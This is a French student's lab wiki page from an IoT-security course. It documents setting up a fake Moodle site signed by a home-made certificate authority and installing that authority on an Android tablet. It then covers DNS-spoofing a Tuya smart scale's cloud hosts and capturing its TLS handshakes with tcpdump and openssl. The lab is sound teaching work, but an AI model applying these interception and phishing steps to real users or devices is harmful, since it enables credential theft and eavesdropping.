Chain PREROUTING (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
0 0 REDIRECT 6 -- eth0 * 0.0.0.0/0 0.0.0.0/0 tcp dpt:80 redir ports 8080

Chain INPUT (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination

Chain OUTPUT (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination

Chain POSTROUTING (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
385 133K MASQUERADE 0 -- * eth0 172.16.10.0/24 0.0.0.0/0
0 0 MASQUERADE 0 -- * eth0 172.16.10.0/24 0.0.0.0/0
</syntaxhighlight>

== Serveur apache sécurise (04/10) ==

Dans un premier temps, on va créer un certificat auto-signé :

<code>openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout /etc/ssl/apache/apache-selfsigned.key -out /etc/ssl/apache/apache-selfsigned.crt -subj "/C=FR/ST=Nord/L=Lille/O=Popo/CN=moodle.com"</code>

Puis, on configure <code>Apache2</code>
<syntaxhighlight lang="linux-config">
GNU nano 7.2 /etc/apache2/sites-available/secure-site.conf
<VirtualHost *:443>
ServerName moodle.com

DocumentRoot /var/www/html

SSLEngine on
SSLCertificateFile /etc/ssl/apache/apache.crt
SSLCertificateKeyFile /etc/ssl/apache/apache.key

# Optionnel : log
ErrorLog ${APACHE_LOG_DIR}/ssl-error.log
CustomLog ${APACHE_LOG_DIR}/ssl-access.log combined
</VirtualHost>

# Redirection HTTP ^f^r HTTPS
<VirtualHost *:80>
ServerName moodle.com
Redirect permanent / https://moodle.com/
</VirtualHost>
</syntaxhighlight>

Maintenant, en prévision de la suite (voir explication dans Machine virtuelle Android), on va créer une autorité de certification nommée CertiFiable :

<code>openssl req -x509 -new -nodes -keyout ca.key -sha256 -days 365 -out ca.crt -subj "/CN=CertiFiable"</code>

Puis, on vient générer une demande de signature de certificat :

<code>openssl req -new -newkey rsa:2048 -nodes -keyout apache.key -out apache.csr -subj "/CN=moodle.com"</code>

Enfin, on vient signer le site avec le certificat de CertiFiable :

<code>openssl x509 -req -in apache.csr -CA ca.crt -CAkey ca.key -CAcreateserial -out apache.crt -days 365 -sha256</code>

= Machine virtuelle <code>android</code> =

== Première tentative ==
Actuellement, si on navigue sur internet et que l'on se rend sur moodle.com, on atterrit bien sûr le faux Moodle, mais comme le téléphone ne connait pas l'autorité de certification nommé CertiFiable, on a le droit à ce magnifique message de connexion non sécurisée :

[[Fichier:Avertissement moodle.png|sans_cadre]][[Fichier:Moodle le magnifique.png|sans_cadre]]

Malheureusement, il est aujourd'hui impossible d'ajouter facilement une autorité de certification sur son téléphone.

C'est pour cela qu'une solution proposée est d'installer une machine virtuelle d'une ancienne version d'<code>Android</code> où il était possible d'en ajouter.

En ayant suivi ce tuto (https://help.clouding.io/hc/en-us/articles/4405454393756-How-to-virtualize-Android-with-QEMU-KVM), j'ai réussi à installer une VM sur Zabeth4 (j'ai dû prendre une autre iso car celle du site était inaccessible).

J'ai installé <code>VNC Viewer</code> pour pouvoir manipuler la machine virtuelle.

En étant sur la VM, j'ai pu me rendre compte qu'il n'était pas possible de se connecter au WiFi, c'est la connexion du pc qui est simulé comme un réseau WiFi dans la VM.

J'ai pu réfléchir à deux solutions avant que la VM ne crash d'elle-même et soit impossible à redémarrer...

La première est toute simple, connecter la Zabeth directement au WiFi, ce qui est difficile à distance. La seconde, qui est je pense possible, est de changer la carte réseau dans les fichiers de conf de la VM pour mettre celle supportant le WiFi.

Je n'ai donc pu tester aucune de ces deux solutions, la VM n'étant plus.

== Seconde tentative ==

qemu-system-x86_64 -net nic -net user -m 1024 -enable-kvm -display sdl -drive file=android.img,format=raw

qemu-system-x86_64 -net nic -net user -m 1024 -enable-kvm -display sdl -drive file=android.img,format=raw -cdrom *android-x86*.iso -boot d

qemu-system-x86_64 -m 2048 -enable-kvm -cpu host -smp 2 -display sdl -drive file=android.img,format=raw,if=virtio -usb -device usb-host,vendorid=0x148f,productid=0x5370

== Ultime tentative ==
//TO DO Ajouter méthode routage android Android studio.

= Machine <code>android</code> (06/10) =
Pour cette dernière partie, j'ai retrouvé une tablette sous <code>Android 4.4 KitKat</code> qui permet d'ajouter des autorités de certification.

C'est donc ce que j'ai fait :

[[Fichier:Photo_certifiable.png|sans_cadre]]

Maintenant, on constate en se connectant sur moodle.com à partir de cette tablette que l'on est bien redirigé vers le faux site et qu'il est sécurisé avec le magnifique cadenas vert.

[[Fichier:Photo moodle.png|sans_cadre]]

(cette page web date du 06/10/25, elle n'est plus valable depuis le 10/10/25...)

= Nedis Wi-Fi Smart Personal Scales =

Dans ce second TP, nous allons jouer avec ce pèse personne de nedis.

Dans un premier temps, j'ai connecté la balance au résau SE5-SSID10.

Puis j'ai remarqué que quand je tentai de me peser, la balance affiche err2.

Après une courte investigation, il s'agit d'une balance qui émet des signaux électriques pour analyser la composition corporelle donc si on se pèse avec des chaussures, cela pose problème.

Pour la suite du projet, on se pèsera avec les mains.

[[Fichier:Poid_sur_app_nedis.png|sans_cadre]]

On constate sur ces paquets la requête de la balance pour obtenir une IP, puis le moment ou elle l'obtient. A chaque fois qu'elle redémarre, elle vient récupérer une IP, elle n'aura donc pas forcement la 105.

[[Fichier:WS connection balance.png|sans_cadre|858x858px]]

Je peux donc ping ma balance depuis mon pc (celui qui host ma vm)

[[Fichier:PIng balance.png|sans_cadre]]

tcpdump -i eth1 -n port 53:<syntaxhighlight lang="linux-config">
14:46:51.115996 IP 172.16.10.105.49153 > 172.16.10.1.53: 13861+ A? m2.tuyaeu.com. (31)
14:46:51.125611 IP 172.16.10.1.53 > 172.16.10.105.49153: 13861 3/0/0 A 3.120.92.134, A 18.184.31.90, A 35.156.44.172 (79)
14:46:51.168250 IP 172.16.10.105.49153 > 172.16.10.1.53: 59035+ A? a3.tuyaeu.com. (31)
14:46:51.177967 IP 172.16.10.1.53 > 172.16.10.105.49153: 59035 3/0/0 A 18.198.62.99, A 18.158.227.228, A 3.67.116.46 (79)
14:46:51.703179 IP 172.16.10.102.57661 > 172.16.10.1.53: 30982+ AAAA? a1.tuyaeu.com. (31)
14:46:51.706085 IP 172.16.10.102.57662 > 172.16.10.1.53: 15654+ A? a1.tuyaeu.com. (31)
14:46:51.713159 IP 172.16.10.1.53 > 172.16.10.102.57661: 30982 3/0/0 AAAA 2a05:d014:afa:af02:262a:be09:e328:ff21, AAAA 2a05:d014:afa:af01:87dc:dc67:35a1:5bfe, AAAA 2a05:d014:afa:af00:1ee2:1f00:e061:e8bf (115)
14:46:51.715736 IP 172.16.10.1.53 > 172.16.10.102.57662: 15654 3/0/0 A 3.78.92.3, A 35.159.150.3, A 3.121.33.91 (79)

56 packets captured
56 packets received by filter
0 packets dropped by kernel
[4343449.827028] device eth1 left promiscuous mode

</syntaxhighlight>visiblement notre balance communque avec tuya via m2.tuyaeu.com et a3.tuyaeu.com

et la vm android a1.tuyaeu.com

tcpdump -i eth1 -n port 53: après avoir crée dns, site, etc a1.tuyaeu.com<syntaxhighlight lang="linux-config">
root@SE5:/etc/apache2/sites-available# tcpdump -i eth1 -n port 53
[5544865.540418] device eth1 entered promiscuous mode
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on eth1, link-type EN10MB (Ethernet), snapshot length 262144 bytes
12:30:55.146437 IP 172.16.10.1.53 > 172.16.10.100.17620: 23156 5/0/0 CNAME reddit.map.fastly.net., A 151.101.129.140, A
151.101.1.140, A 151.101.65.140, A 151.101.193.140 (129)
12:30:55.168796 IP 172.16.10.1.53 > 172.16.10.100.24249: 64622 2/0/0 CNAME us-central1-gcp.api.sc-gw.com., A 35.190.43.
134 (109)
12:30:55.322498 IP 172.16.10.100.26394 > 172.16.10.1.53: 29420+ A? scontent-cdg4-1.xx.fbcdn.net. (46)
12:30:56.095075 IP 172.16.10.100.62675 > 172.16.10.1.53: 46396+ A? cf-st.sc-cdn.net. (34)
12:30:56.121796 IP 172.16.10.1.53 > 172.16.10.100.62675: 46396 1/0/0 A 3.163.248.4 (50)
12:30:56.539099 IP 172.16.10.1.53 > 172.16.10.100.26394: 29420 1/0/0 A 185.60.219.2 (62)
12:30:57.289763 IP 172.16.10.100.7071 > 172.16.10.1.53: 14247+ A? usc1-gcp-v62.api.snapchat.com. (47)
12:30:57.302767 IP 172.16.10.1.53 > 172.16.10.100.7071: 14247 2/0/0 CNAME usc1-gcp-v62.api.sc-gw.com., A 34.120.159.232
(103)
12:30:58.490060 IP 172.16.10.105.49153 > 172.16.10.1.53: 50294+ A? m2.tuyaeu.com. (31)
12:30:58.490174 IP 172.16.10.1.53 > 172.16.10.105.49153: 50294* 2/0/0 CNAME ns.tuyaeu.com., A 172.16.10.1 (64)
12:30:58.540041 IP 172.16.10.105.49153 > 172.16.10.1.53: 23785+ A? a3.tuyaeu.com. (31)
12:30:58.540132 IP 172.16.10.1.53 > 172.16.10.105.49153: 23785* 2/0/0 CNAME ns.tuyaeu.com., A 172.16.10.1 (64)
12:31:00.979103 IP 172.16.10.100.63625 > 172.16.10.1.53: 63574+ A? gql-fed.reddit.com. (36)
12:31:00.997721 IP 172.16.10.1.53 > 172.16.10.100.63625: 63574 5/0/0 CNAME reddit.map.fastly.net., A 151.101.65.140, A
151.101.129.140, A 151.101.193.140, A 151.101.1.140 (135)
12:31:04.461507 IP 172.16.10.102.63971 > 172.16.10.1.53: 20792+ A? discord.com. (29)
12:31:04.461519 IP 172.16.10.102.54572 > 172.16.10.1.53: 15444+ Type65? discord.com. (29)
12:31:04.493098 IP 172.16.10.1.53 > 172.16.10.102.63971: 20792 5/0/0 A 162.159.138.232, A 162.159.136.232, A 162.159.12
8.233, A 162.159.135.232, A 162.159.137.232 (109)
12:31:04.493306 IP 172.16.10.1.53 > 172.16.10.102.54572: 15444 1/0/5 Type65 (158)
18 packets captured
18 packets received by filter
0 packets dropped by kernel

</syntaxhighlight>tcpdump -i eth1 host 172.16.10.105 and not port 53 -A<syntaxhighlight lang="linux-config">
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on eth1, link-type EN10MB (Ethernet), snapshot length 262144 bytes
12:36:41.148741 IP 172.16.10.0.bootps > 172.16.10.105.bootpc: BOOTP/DHCP, Reply, length 300
E..H..........
...
i.C.D.4......<\)...........
i..........|.-L........................................................................................................
..................................................................................................c.Sc5..6...
.3....X..........
.....
.. plil.info................
12:36:41.161323 IP 172.16.10.0.bootps > 172.16.10.105.bootpc: BOOTP/DHCP, Reply, length 300
E..H..........
...
i.C.D.4g.....[.}T..........
i..........|.-L........................................................................................................
..................................................................................................c.Sc5..6...
.3....X..........
.....
.. plil.info................
12:36:41.167616 ARP, Request who-has 172.16.10.105 tell 0.0.0.0, length 46
..........|.-L............
i....P....Y...c....
12:36:41.490919 ARP, Request who-has 172.16.10.105 tell 0.0.0.0, length 46
..........|.-L............
i.r.u....).........
12:36:41.993612 ARP, Request who-has 172.16.10.105 tell 172.16.10.105, length 46
..........|.-L..
i........
i..HE.....f........
12:36:42.011664 ARP, Request who-has 172.16.10.1 tell 172.16.10.105, length 46
..........|.-L..
i........
.....up. ..........
12:36:42.011672 ARP, Reply 172.16.10.1 is-at 00:16:3e:23:74:42 (oui Unknown), length 28
..........>#tB..
...|.-L..
i
12:36:42.019053 IP 172.16.10.105.3872 > 172.16.10.1.8886: Flags [S], seq 6509, win 4380, options [mss 1460], length 0
E..,......O>..
i..
.. "....m....`....<........
12:36:42.019100 IP 172.16.10.1.8886 > 172.16.10.105.3872: Flags [R.], seq 0, ack 6510, win 0, length 0
E..(..@.@..E..
...
i".. .......nP.......
12:36:42.070419 IP 172.16.10.105.17034 > 172.16.10.1.https: Flags [S], seq 6509, win 4380, options [mss 1460], length 0
E..,......O<..
i..
.B......m....`...........<.
12:36:42.070442 IP 172.16.10.1.https > 172.16.10.105.17034: Flags [S.], seq 3767910189, ack 6510, win 64240, options [m
ss 1460], length 0
E..,..@.@..A..
...
i..B....-...n`...l.......
12:36:42.077437 IP 172.16.10.105.17034 > 172.16.10.1.https: Flags [.], ack 1, win 4380, length 0
E..(......O?..
i..
.B......n....P...4......
..
12:36:42.079986 IP 172.16.10.105.17034 > 172.16.10.1.https: Flags [P.], seq 1:68, ack 1, win 4380, length 67
E..k......N...
i..
.B......n....P...........>...:..BAohBAohbmd6aG91IFR1eVjaG5vbG9SB........................
12:36:42.080012 IP 172.16.10.1.https > 172.16.10.105.17034: Flags [.], ack 68, win 64173, length 0
E..(..@.@.....
...
i..B.........P...l...
12:36:42.080447 IP 172.16.10.1.https > 172.16.10.105.17034: Flags [P.], seq 1:8, ack 68, win 64173, length 7
E../..@.@.....
...
i..B.........P...l.........(
12:36:42.080533 IP 172.16.10.1.https > 172.16.10.105.17034: Flags [F.], seq 8, ack 68, win 64173, length 0
E..(..@.@.....
...
i..B....5....P...l...
12:36:42.101652 IP 172.16.10.105.17034 > 172.16.10.1.https: Flags [.], ack 8, win 4373, length 0
E..(. ....O<..
i..
.B..........5P...4s........
12:36:42.102116 IP 172.16.10.105.17034 > 172.16.10.1.https: Flags [R.], seq 68, ack 8, win 4380, length 0
E..(.
....O;..
i..
.B..........5P...4h.....
..
12:36:43.025368 IP 172.16.10.105.23869 > 172.16.10.1.8886: Flags [S], seq 6511, win 4380, options [mss 1460], length 0
E..,......O6..
i..
.]="....o....`............9
12:36:43.025387 IP 172.16.10.1.8886 > 172.16.10.105.23869: Flags [R.], seq 0, ack 6512, win 0, length 0
E..(..@.@..E..
...
i".]=.......pP.......
12:36:44.025225 IP 172.16.10.105.22317 > 172.16.10.1.8886: Flags [S], seq 6513, win 4380, options [mss 1460], length 0
E..,......O5..
i..
.W-"....q....`....+........
12:36:44.025269 IP 172.16.10.1.8886 > 172.16.10.105.22317: Flags [R.], seq 0, ack 6514, win 0, length 0
E..(..@.@..E..
...
i".W-.......rP.......
12:36:45.025301 IP 172.16.10.105.31465 > 172.16.10.1.8886: Flags [S], seq 6517, win 4380, options [mss 1460], length 0
E..,......O4..
i..
.z."....u....`...ck......E.
12:36:45.025318 IP 172.16.10.1.8886 > 172.16.10.105.31465: Flags [R.], seq 0, ack 6518, win 0, length 0
E..(..@.@..E..
...
i".z........vP....0..
12:36:46.025500 IP 172.16.10.105.9070 > 172.16.10.1.8886: Flags [S], seq 6521, win 4380, options [mss 1460], length 0
E..,......O3..
i..
.#n"....y....`.............
12:36:46.025517 IP 172.16.10.1.8886 > 172.16.10.105.9070: Flags [R.], seq 0, ack 6522, win 0, length 0
E..(..@.@..E..
...
i".#n.......zP.......
12:36:47.033189 IP 172.16.10.105.51179 > 172.16.10.1.8886: Flags [S], seq 6527, win 4380, options [mss 1460], length 0
E..,......O2..
i..
...".........`...._......y.
12:36:47.033206 IP 172.16.10.1.8886 > 172.16.10.105.51179: Flags [R.], seq 0, ack 6528, win 0, length 0
E..(..@.@..E..
...
i"...........P...?$..
12:36:47.263020 ARP, Request who-has 172.16.10.105 tell 172.16.10.1, length 28
..........>#tB..
.........
i
12:36:48.287049 ARP, Request who-has 172.16.10.105 tell 172.16.10.1, length 28
..........>#tB..
.........
i
12:36:48.653641 IP 172.16.10.0.bootps > 172.16.10.105.bootpc: BOOTP/DHCP, Reply, length 300
E..H..........
...
i.C.D.4B...................
i..........|.-L........................................................................................................
..................................................................................................c.Sc5..6...
.3....Q..........
.....
.. plil.info................
12:36:48.663352 IP 172.16.10.0.bootps > 172.16.10.105.bootpc: BOOTP/DHCP, Reply, length 300
E..H..........
...
i.C.D.4.L.......p..........
i..........|.-L........................................................................................................
..................................................................................................c.Sc5..6...
.3....Q..........
.....
.. plil.info................
12:36:48.674677 ARP, Request who-has 172.16.10.105 tell 0.0.0.0, length 46
..........|.-L............
i>#tB./..P.........
12:36:48.993649 ARP, Request who-has 172.16.10.105 tell 0.0.0.0, length 46
..........|.-L............
ir...P.............
12:36:49.311055 ARP, Request who-has 172.16.10.105 tell 172.16.10.1, length 28
..........>#tB..
.........
i
12:36:49.490922 ARP, Request who-has 172.16.10.105 tell 172.16.10.105, length 46
..........|.-L..
i........
i.......x....D.....
12:36:49.492262 ARP, Reply 172.16.10.105 is-at a4:e5:7c:16:2d:4c (oui Unknown), length 46
..........|.-L..
i..>#tB..
...................
12:36:49.515651 IP 172.16.10.105.29415 > 172.16.10.1.8886: Flags [S], seq 6536, win 4380, options [mss 1460], length 0
E..,......O...
i..
.r.".........`...kZ........
12:36:49.515669 IP 172.16.10.1.8886 > 172.16.10.105.29415: Flags [R.], seq 0, ack 6537, win 0, length 0
E..(..@.@..E..
...
i".r.........P.......
12:36:49.518628 IP 172.16.10.105.31325 > 172.16.10.1.https: Flags [S], seq 6539, win 4380, options [mss 1460], length 0
E..,......O-..
i..
.z]..........`.............
12:36:49.518648 IP 172.16.10.1.https > 172.16.10.105.31325: Flags [S.], seq 1378912894, ack 6540, win 64240, options [m
ss 1460], length 0
E..,..@.@..A..
...
i..z]R0.~....`...l.......
12:36:49.523505 IP 172.16.10.105.31325 > 172.16.10.1.https: Flags [.], ack 1, win 4380, length 0
E..(......O0..
i..
.z]......R0..P........a3.tu
12:36:49.527055 IP 172.16.10.105.31325 > 172.16.10.1.https: Flags [P.], seq 1:68, ack 1, win 4380, length 67
E..k......N...
i..
.z]......R0..P...G?......>...:..BAohBAohbmd6aG91IFR1eVjaG5vbG9SB........................
12:36:49.527081 IP 172.16.10.1.https > 172.16.10.105.31325: Flags [.], ack 68, win 64173, length 0
E..(..@.@..X..
...
i..z]R0......P...l...
12:36:49.527462 IP 172.16.10.1.https > 172.16.10.105.31325: Flags [P.], seq 1:8, ack 68, win 64173, length 7
E../..@.@..P..
...
i..z]R0......P...l.........(
12:36:49.527530 IP 172.16.10.1.https > 172.16.10.105.31325: Flags [F.], seq 8, ack 68, win 64173, length 0
E..(..@.@..V..
...
i..z]R0......P...l...
12:36:49.569636 IP 172.16.10.105.31325 > 172.16.10.1.https: Flags [.], ack 8, win 4373, length 0
E..(......O...
i..
.z]......R0..P..........C.@
12:36:49.574893 IP 172.16.10.105.31325 > 172.16.10.1.https: Flags [R.], seq 68, ack 8, win 4380, length 0
E..(......O-..
i..
.z]......R0..P..........
..
12:36:50.310055 ARP, Request who-has 172.16.10.105 tell 172.16.10.105, length 46
..........|.-L..
i........
i........ ....>....
12:36:53.526624 IP 172.16.10.105.48314 > 172.16.10.1.8886: Flags [S], seq 6547, win 4380, options [mss 1460], length 0
E..,......O&..
i..
...".........`...!|........
12:36:53.526669 IP 172.16.10.1.8886 > 172.16.10.105.48314: Flags [R.], seq 0, ack 6548, win 0, length 0
E..(..@.@..E..
...
i"...........P...JA..
12:36:54.536817 IP 172.16.10.105.44185 > 172.16.10.1.8886: Flags [S], seq 6567, win 4380, options [mss 1460], length 0
E..,......O%..
i..
...".........`...1.........
12:36:54.536835 IP 172.16.10.1.8886 > 172.16.10.105.44185: Flags [R.], seq 0, ack 6568, win 0, length 0
E..(..@.@..E..
...
i"...........P...ZN..
12:36:55.545631 IP 172.16.10.105.26626 > 172.16.10.1.8886: Flags [S], seq 6589, win 4380, options [mss 1460], length 0
E..,......O$..
i..
.h.".........`...v
........
12:36:55.545649 IP 172.16.10.1.8886 > 172.16.10.105.26626: Flags [R.], seq 0, ack 6590, win 0, length 0
E..(..@.@..E..
...
i".h.........P.......
12:36:56.554680 IP 172.16.10.105.16244 > 172.16.10.1.8886: Flags [S], seq 6611, win 4380, options [mss 1460], length 0
E..,......O#..
i..
.?t".........`.............
12:36:56.554698 IP 172.16.10.1.8886 > 172.16.10.105.16244: Flags [R.], seq 0, ack 6612, win 0, length 0
E..(..@.@..E..
...
i".?t........P....G..
^C
57 packets captured
57 packets received by filter
0 packets dropped by kernel
</syntaxhighlight>port 8886 chez tuya ?

<syntaxhighlight lang="linux-config">
root@SE5:/etc/apache2/sites-available# openssl s_server -accept 8886 -cert /etc/ssl/apache/ca.crt -key /etc/ssl/apache/ca.key -debug
Using default temp DH parameters
ACCEPT
read from 0x55b0357c45c0 [0x55b0357db203] (5 bytes => 5 (0x5))
0000 - 16 03 03 00 3e ....>
read from 0x55b0357c45c0 [0x55b0357db208] (62 bytes => 62 (0x3E))
0000 - 01 00 00 3a 03 03 42 41-6f 68 42 41 6f 68 62 6d ...:..BAohBAohbm
0010 - 64 36 61 47 39 31 49 46-52 31 65 56 6a 61 47 35 d6aG91IFR1eVjaG5
0020 - 76 62 47 39 53 42 00 00-04 00 ae 00 ff 01 00 00 vbG9SB..........
0030 - 0d 00 01 00 01 02 00 16-00 00 00 17 00 00 ..............
write to 0x55b0357c45c0 [0x55b0357e4430] (7 bytes => 7 (0x7))
0000 - 15 03 03 00 02 02 28 ......(
ERROR
801B7259B87F0000:error:0A0000C1:SSL routines:tls_post_process_client_hello:no shared cipher:../ssl/statem/statem_srvr.c:2220:
shutting down SSL
CONNECTION CLOSED
read from 0x55b0357c2410 [0x55b0357db203] (5 bytes => 5 (0x5))
0000 - 16 03 03 00 3e ....>
read from 0x55b0357c2410 [0x55b0357db208] (62 bytes => 62 (0x3E))
0000 - 01 00 00 3a 03 03 42 41-6f 68 42 41 6f 68 62 6d ...:..BAohBAohbm
0010 - 64 36 61 47 39 31 49 46-52 31 65 56 6a 61 47 35 d6aG91IFR1eVjaG5
0020 - 76 62 47 39 53 42 00 00-04 00 ae 00 ff 01 00 00 vbG9SB..........
0030 - 0d 00 01 00 01 02 00 16-00 00 00 17 00 00 ..............
write to 0x55b0357c2410 [0x55b0357e4430] (7 bytes => 7 (0x7))
0000 - 15 03 03 00 02 02 28 ......(
ERROR
801B7259B87F0000:error:0A0000C1:SSL routines:tls_post_process_client_hello:no shared cipher:../ssl/statem/statem_srvr.c:2220:
shutting down SSL
CONNECTION CLOSED
read from 0x55b0357c1930 [0x55b0357db203] (5 bytes => 5 (0x5))
0000 - 16 03 03 00 3e ....>
read from 0x55b0357c1930 [0x55b0357db208] (62 bytes => 62 (0x3E))
0000 - 01 00 00 3a 03 03 42 41-6f 68 42 41 6f 68 62 6d ...:..BAohBAohbm
0010 - 64 36 61 47 39 31 49 46-52 31 65 56 6a 61 47 35 d6aG91IFR1eVjaG5
0020 - 76 62 47 39 53 42 00 00-04 00 ae 00 ff 01 00 00 vbG9SB..........
0030 - 0d 00 01 00 01 02 00 16-00 00 00 17 00 00 ..............
write to 0x55b0357c1930 [0x55b0357e4430] (7 bytes => 7 (0x7))
0000 - 15 03 03 00 02 02 28 ......(
ERROR
801B7259B87F0000:error:0A0000C1:SSL routines:tls_post_process_client_hello:no shared cipher:../ssl/statem/statem_srvr.c:2220:
shutting down SSL
CONNECTION CLOSED
read from 0x55b0357c45c0 [0x55b0357db203] (5 bytes => 5 (0x5))
0000 - 16 03 03 00 3e ....>
read from 0x55b0357c45c0 [0x55b0357db208] (62 bytes => 62 (0x3E))
0000 - 01 00 00 3a 03 03 42 41-6f 68 42 41 6f 68 62 6d ...:..BAohBAohbm
0010 - 64 36 61 47 39 31 49 46-52 31 65 56 00 00 00 00 d6aG91IFR1eV....
0020 - 00 00 00 00 00 00 00 00-04 00 ae 00 ff 01 00 00 ................
0030 - 0d 00 01 00 01 02 00 16-00 00 00 17 00 00 ..............
write to 0x55b0357c45c0 [0x55b0357e4430] (7 bytes => 7 (0x7))
0000 - 15 03 03 00 02 02 28 ......(
ERROR
801B7259B87F0000:error:0A0000C1:SSL routines:tls_post_process_client_hello:no shared cipher:../ssl/statem/statem_srvr.c:2220:
shutting down SSL
CONNECTION CLOSED
read from 0x55b0357c2410 [0x55b0357db203] (5 bytes => 5 (0x5))
0000 - 16 03 03 00 3e ....>
read from 0x55b0357c2410 [0x55b0357db208] (62 bytes => 62 (0x3E))
0000 - 01 00 00 3a 03 03 42 41-6f 68 42 41 6f 68 62 00 ...:..BAohBAohb.
0010 - 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
0020 - 00 00 00 00 00 00 00 00-04 00 ae 00 ff 01 00 00 ................
0030 - 0d 00 01 00 01 02 00 16-00 00 00 17 00 00 ..............
write to 0x55b0357c2410 [0x55b0357e4430] (7 bytes => 7 (0x7))
0000 - 15 03 03 00 02 02 28 ......(
ERROR
801B7259B87F0000:error:0A0000C1:SSL routines:tls_post_process_client_hello:no shared cipher:../ssl/statem/statem_srvr.c:2220:
shutting down SSL
CONNECTION CLOSED
read from 0x55b0357c1930 [0x55b0357db203] (5 bytes => 5 (0x5))
0000 - 16 03 03 00 3e ....>
read from 0x55b0357c1930 [0x55b0357db208] (62 bytes => 62 (0x3E))
0000 - 01 00 00 3a 03 03 42 41-6f 68 42 41 6f 68 62 6d ...:..BAohBAohbm
0010 - 64 36 61 47 39 31 49 46-52 31 65 56 6a 61 47 35 d6aG91IFR1eVjaG5
0020 - 76 62 47 39 53 42 00 00-04 00 ae 00 ff 01 00 00 vbG9SB..........
0030 - 0d 00 01 00 01 02 00 16-00 00 00 17 00 00 ..............
write to 0x55b0357c1930 [0x55b0357e4430] (7 bytes => 7 (0x7))
0000 - 15 03 03 00 02 02 28 ......(
ERROR
801B7259B87F0000:error:0A0000C1:SSL routines:tls_post_process_client_hello:no shared cipher:../ssl/statem/statem_srvr.c:2220:
shutting down SSL
CONNECTION CLOSED
read from 0x55b0357c45c0 [0x55b0357db203] (5 bytes => 5 (0x5))
0000 - 16 03 03 00 3e ....>
read from 0x55b0357c45c0 [0x55b0357db208] (62 bytes => 62 (0x3E))
0000 - 01 00 00 3a 03 03 42 41-6f 68 42 41 6f 68 62 6d ...:..BAohBAohbm
0010 - 64 36 61 47 39 31 49 46-52 31 65 56 6a 61 47 35 d6aG91IFR1eVjaG5
0020 - 76 62 47 39 53 42 00 00-04 00 ae 00 ff 01 00 00 vbG9SB..........
0030 - 0d 00 01 00 01 02 00 16-00 00 00 17 00 00 ..............
write to 0x55b0357c45c0 [0x55b0357e4430] (7 bytes => 7 (0x7))
0000 - 15 03 03 00 02 02 28 ......(
ERROR
801B7259B87F0000:error:0A0000C1:SSL routines:tls_post_process_client_hello:no shared cipher:../ssl/statem/statem_srvr.c:2220:
shutting down SSL
CONNECTION CLOSED
read from 0x55b0357c2410 [0x55b0357db203] (5 bytes => 5 (0x5))
0000 - 16 03 03 00 3e ....>
read from 0x55b0357c2410 [0x55b0357db208] (62 bytes => 62 (0x3E))
0000 - 01 00 00 3a 03 03 42 41-6f 68 42 41 6f 68 62 6d ...:..BAohBAohbm
0010 - 64 36 61 47 00 00 00 00-00 00 00 00 00 00 00 00 d6aG............
0020 - 00 00 00 00 00 00 00 00-04 00 ae 00 ff 01 00 00 ................
0030 - 0d 00 01 00 01 02 00 16-00 00 00 17 00 00 ..............
write to 0x55b0357c2410 [0x55b0357e4430] (7 bytes => 7 (0x7))
0000 - 15 03 03 00 02 02 28 ......(
ERROR
801B7259B87F0000:error:0A0000C1:SSL routines:tls_post_process_client_hello:no shared cipher:../ssl/statem/statem_srvr.c:2220:
shutting down SSL
CONNECTION CLOSED
read from 0x55b0357c1930 [0x55b0357db203] (5 bytes => 5 (0x5))
0000 - 16 03 03 00 3e ....>
read from 0x55b0357c1930 [0x55b0357db208] (62 bytes => 62 (0x3E))
0000 - 01 00 00 3a 03 03 42 41-6f 68 42 41 6f 68 62 6d ...:..BAohBAohbm
0010 - 64 36 61 47 39 31 49 46-52 31 65 56 6a 61 47 35 d6aG91IFR1eVjaG5
0020 - 76 62 47 39 53 42 00 00-04 00 ae 00 ff 01 00 00 vbG9SB..........
0030 - 0d 00 01 00 01 02 00 16-00 00 00 17 00 00 ..............
write to 0x55b0357c1930 [0x55b0357e4430] (7 bytes => 7 (0x7))
0000 - 15 03 03 00 02 02 28 ......(
ERROR
801B7259B87F0000:error:0A0000C1:SSL routines:tls_post_process_client_hello:no shared cipher:../ssl/statem/statem_srvr.c:2220:
shutting down SSL
CONNECTION CLOSED
</syntaxhighlight>

SE5 IdO sécurité des objets 2025/2026 b1

2025-12-02T14:25:04Z

Vdetrez : /* Nedis Wi-Fi Smart Personal Scales */

SE5 IdO sécurité des objets 2025/2026 b1

2025-12-02T14:07:25Z

Vdetrez : /* Nedis Wi-Fi Smart Personal Scales */

SE5 IdO sécurité des objets 2025/2026 b1

2025-11-18T16:33:43Z

Vdetrez : /* Nedis Wi-Fi Smart Personal Scales */

SE5 IdO sécurité des objets 2025/2026 b1

2025-11-18T15:47:00Z

Vdetrez : /* Nedis Wi-Fi Smart Personal Scales */

SE5 IdO sécurité des objets 2025/2026 b1

2025-11-18T15:44:55Z

Vdetrez : /* Nedis Wi-Fi Smart Personal Scales */

Fichier:PIng balance.png

2025-11-18T15:44:40Z

Vdetrez :

SE5 IdO sécurité des objets 2025/2026 b1

2025-11-18T15:26:20Z

Vdetrez : /* Nedis Wi-Fi Smart Personal Scales */

Fichier:WS connection balance.png

2025-11-18T15:24:33Z

Vdetrez :

SE5 IdO sécurité des objets 2025/2026 b1

2025-11-18T14:11:21Z

Vdetrez : /* Nedis Wi-Fi Smart Personal Scales */

Fichier:Poid sur app nedis.png

2025-11-18T14:10:09Z

Vdetrez :

SE5 IdO sécurité des objets 2025/2026 b1

2025-11-18T14:07:48Z

Vdetrez :

SE5 IdO sécurité des objets 2025/2026 b1

2025-11-18T13:32:04Z

Vdetrez : /* Machine android (06/10) */

SE5 IdO sécurité des objets 2025/2026 b1

2025-11-03T16:57:13Z

Vdetrez : /* Machine virtuelle android */

SE5 IdO sécurité des objets 2025/2026 b1

2025-11-03T15:48:21Z

Vdetrez : /* Machine android (06/10) */

SE5 IdO sécurité des objets 2025/2026 b1

2025-10-13T13:54:47Z

Vdetrez : /* Redirection réseau */

SE5 IdO sécurité des objets 2025/2026 b1

2025-10-07T17:12:35Z

Vdetrez : /* Serveur virtuel (17/09) */

